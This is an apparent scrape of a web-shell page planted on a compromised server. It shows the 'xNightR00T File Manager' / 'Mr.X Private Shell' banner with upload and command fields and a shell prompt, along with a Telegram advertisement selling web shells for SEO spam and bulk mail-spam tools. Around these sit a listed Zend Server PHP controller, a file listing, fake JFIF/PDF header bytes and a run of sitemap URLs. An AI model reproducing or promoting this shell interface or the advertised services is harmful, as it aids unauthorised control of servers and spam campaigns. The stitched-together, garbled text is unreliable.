xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace EventsGroup\Controller;

use ZendServer\Exception;
use ZendServer\Mvc\Controller\WebAPIActionController;
use Zend\Mvc\Controller\ActionController,
    Application\Module,
    ZendServer,
    WebAPI,
    ZendServer\Text,
    Zend\Validator\StringLength,
    ZendServer\Log\Log;

class WebAPIController extends WebAPIActionController
{

    public function monitorGetBacktraceFileAction()
    {
        $this->isMethodGet();

        $params = $this->getParameters();
        $this->validateMandatoryParameters($params, array('eventsGroupId', 'backtraceNum'));

        $groupId      = $params['eventsGroupId'];
        $backtraceNum = $params['backtraceNum'];

        $retriever = $this->getLocator('EventsGroup\BacktraceSourceRetriever'); /* @var $retriever \EventsGroup\BacktraceSourceRetriever */
        try {
            $source         = $retriever->getHighlightedSource($groupId, $backtraceNum);
            $rowToHighLight = $retriever->getHighlightedLine($groupId, $backtraceNum);
        } catch (Exception $e) {
            Log::warn($e->getMessage());
            Log::debug($e);
            throw new WebAPI\Exception($e->getMessage(), WebAPI\Exception::INTERNAL_SERVER_ERROR, $e);
        }

        return array('sourcePayload' => base64_encode($source), 'highlightLine' => $rowToHighLight);
    }

    /**
     *
     * @param string $requestUid
     * @reutrn string
     * @throws WebAPI\Exception
     */
    private function getRequestTrace($requestUid)
    {
        try {
            $tracePath = $this->getMonitorUiModel()->prepareRequestTrace($requestUid);
        } catch (\Exception $e) {
            throw new WebAPI\Exception(_t('Trace not found: %s', array($e->getMessageObject())),
            WebAPI\Exception::NO_SUCH_TRACE);
        }

        $traceId = $this->getCodetracingModel()->getDumpIdByFile($tracePath);
        Log::debug("found traceId '{$traceId}' from request '{$requestUid}' (used path '{$tracePath}')");

        return $traceId;
    }

    /**
     * Retrieve an events list object identified by an events-group
     * identifier. The events-group identifier is retrieved from an Issue
     * element's data.
     * 
     * @api
     * @method GET
     * @version 1.2
     * @section Monitoring
     * @name monitorGetEventGroupDetails
     * @url https://docs.roguewave.com/en/zend/Zend-Server/content/monitorgeteventgroupdetails.htm
     * @permissions Read-only
     * @editions Zend Server
     * @param Integer eventsGroupId Required. Events group identifier, provided in the eventsGroup element. Note
     * 	that for backwards compatibility you may also submit an eventGroupId
     * 	parameter and it will be accepted on ZS6.x
     * @param Integer issueId Required. This parameter was removed due to redundancy and is no longer used in
     * 	either WebAPI 1.2 or 1.3 on ZS6.x
     * @response 
     *
     * @return \WebAPI\View\WebApiResponseContainer|\Zend\View\Model\ViewModel|array
     */
    public function monitorGetEventGroupDetailsAction()
    {
        try {
            $this->isMethodGet();
            $params = $this->getParameters(array('limit' => 0));

            /// backwards compatibility issue for version 1.2, cover both parameter names
            if ((!isset($params['eventsGroupId'])) && (isset($params['eventGroupId']))) {
                $params['eventsGroupId'] = $params['eventGroupId'];
            }

            $this->validateMandatoryParameters($params, array('eventsGroupId'));
            $this->validateEventsGroupId($params['eventsGroupId']);
            $this->validateLimit($params['limit']);
        } catch (\Exception $e) {
            $this->handleException($e, 'Input validation failed');
        }

        $monitorEventDb = $this->getMonitorEventsMapper();

        try {
            $event = $monitorEventDb->getEventGroupData($params['eventsGroupId']);
        } catch (ZendServer\Exception $e) {
            throw new WebAPI\Exception($e->getMessage(), WebAPI\Exception::NO_SUCH_EVENTGROUP);
        }
        $monitorUiModel = $this->getMonitorUiModel();
        $issueDetails   = $monitorUiModel->getIssue($event->getIssueId());
        $eventsGroups   = $monitorUiModel->getEventsGroups($event->getIssueId());
        $eventsGroup    = $eventsGroups[$params['eventsGroupId']];

        return array('issue' => $issueDetails, 'event' => $event, 'eventsGroup' => $eventsGroup);
    }

    /**
     *
     * @param integer $limit        	
     * @throws WebAPI\Exception
     */
    protected function validateLimit($limit)
    {
        $this->validateInteger($limit, 'limit');
    }

    /**
     * @param integer $eventsGroupId        	
     * @throws WebAPI\Exception
     */
    protected function validateEventsGroupId($eventsGroupId)
    {
        $this->validateInteger($eventsGroupId, 'eventsGroupId');
    }

    /**
     * @return \MonitorUi\Model\Model
     */
    protected function getMonitorUiModel()
    {
        return $this->getLocator()->get('MonitorUi\Model\Model');
    }
    /*
     * @return \Monitor\Db\Mapper
     */

    protected function getMonitorEventsMapper()
    {
        return $this->getLocator()->get('EventsGroup\Db\Mapper');
    }
}

Filemanager

Name Type Size Permission Actions
Plugin Folder 0755
EventsGroupController.php File 16.69 KB 0644
WebAPI12Controller.php File 539 B 0644
WebAPIController.php File 5.08 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml